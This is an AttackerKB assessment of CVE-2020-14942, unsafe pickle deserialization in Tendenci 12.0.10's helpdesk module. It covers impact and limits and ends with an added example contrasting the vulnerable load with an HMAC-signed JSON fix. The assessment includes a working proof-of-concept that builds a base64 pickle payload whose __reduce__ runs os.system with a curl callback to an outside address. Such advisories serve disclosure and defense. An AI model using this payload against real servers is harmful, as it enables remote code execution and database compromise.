AttackerKB AKB:22D39C68-A736-4F5B-9BB6-83322BC256F6
History: Jun 21, 2020 - 12:00 a.m.

CVE-2020-14942

attackerkb.com

EPSS: 0.005 (Percentile: 75.9%)

Tendenci 12.0.10 allows unrestricted deserialization in apps\helpdesk\views\staff.py.

Recent assessments:

kevthehermit at June 21, 2020 7:03pm UTC reported:

Outline

Untrusted data from the client side is used to create a Python pickled object. This can lead to full RCE and compromise of the host. There are some limitations and this is not the default configuration.

Impact

If you can control the input it may be possible to gain code execution on the underlying server. With code execution you can gain full access to the database and its data.

Limitations

  • The helpdesk module is not enabled by default.

  • A valid authenticated account with permissions to access /tickets

Patch

This does not appear to be patched in the latest release, although it has been acknowledged.

POC

It is fairly easy to create a functional POC against this target if the feature is enabled.

Modify the following POC to fit your needs.

import pickle
import base64
import os


class RCE:
    # pickle calls __reduce__ on dump; on load it calls the returned callable
    # with the returned arguments, so os.system(cmd) runs on the server.
    def __reduce__(self):
        cmd = ('curl 172.22.0.1:1234')  # replace with your own callback/command
        return os.system, (cmd,)


if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    # URL-safe base64 so the payload can be passed as a request parameter
    print(base64.urlsafe_b64encode(pickled).decode())

Assessed Attacker Value: 2
Assessed Attacker Value: 4
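The following is an added example, not code from Tendenci or from the assessment above. It puts the vulnerable pattern the assessment describes (client-supplied base64 fed straight into `pickle.loads`) beside a hardened form that carries the same client-side state as HMAC-signed JSON, so that an unsigned or tampered blob is rejected before anything is deserialized. The request handling is reduced to plain functions over the raw parameter value; the parameter handling, `SECRET_KEY`, and the `log_hit` recorder (which stands in for the `os.system` call in the PoC so the example runs harmlessly) are all hypothetical.

```python
"""Vulnerable vs. hardened handling of a client-supplied serialized object.

Added example, not Tendenci code. SECRET_KEY, log_hit and the function
names are assumptions; the real view's parameter name is not reproduced.
"""
import base64
import hashlib
import hmac
import json
import pickle

SECRET_KEY = b"hypothetical-server-side-secret"  # assumption: known only to the server

# Records that attacker-chosen code ran; stands in for os.system in the PoC.
EXECUTED = []


def log_hit(tag):
    EXECUTED.append(tag)
    return tag


class Payload:
    """Same shape as the PoC class: __reduce__ names the callable and the
    arguments that pickle.loads will invoke. Harmless recorder instead of os.system."""

    def __reduce__(self):
        return log_hit, ("pickle-rce",)


def build_payload():
    """What the PoC prints: URL-safe base64 of the pickled object."""
    return base64.urlsafe_b64encode(pickle.dumps(Payload())).decode()


def vulnerable_load(value):
    """Vulnerable pattern: unpickle whatever the client sent. Loading the
    blob is enough to run the callable chosen by the attacker."""
    return pickle.loads(base64.urlsafe_b64decode(value))


# --- hardened form: data-only encoding plus a server-side MAC ---

def sign(obj):
    """Server side: serialize as JSON (data only, no callables) and append
    an HMAC so the client can carry the blob but cannot alter or forge it."""
    body = base64.urlsafe_b64encode(json.dumps(obj, separators=(",", ":")).encode())
    mac = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest().encode()
    return (body + b"." + mac).decode()


def safe_load(value):
    """Verify the MAC in constant time before parsing; raise on any mismatch."""
    body, _, mac = value.encode().partition(b".")
    expected = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest().encode()
    if not mac or not hmac.compare_digest(mac, expected):
        raise ValueError("bad signature")
    return json.loads(base64.urlsafe_b64decode(body))


def accepts(value):
    """True if the hardened loader accepts the blob, False if it rejects it."""
    try:
        safe_load(value)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("vulnerable:", vulnerable_load(build_payload()), EXECUTED)
    token = sign({"status": "open", "assigned_to": 3})
    print("signed:", safe_load(token))
    print("PoC blob accepted by hardened loader:", accepts(build_payload()))
```

The fix is not a better `pickle.loads` (there is no safe way to unpickle attacker-controlled bytes); it is a data-only format and a MAC keyed with a server secret, which is what Django's own `django.core.signing` provides if you would rather not hand-roll the HMAC.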
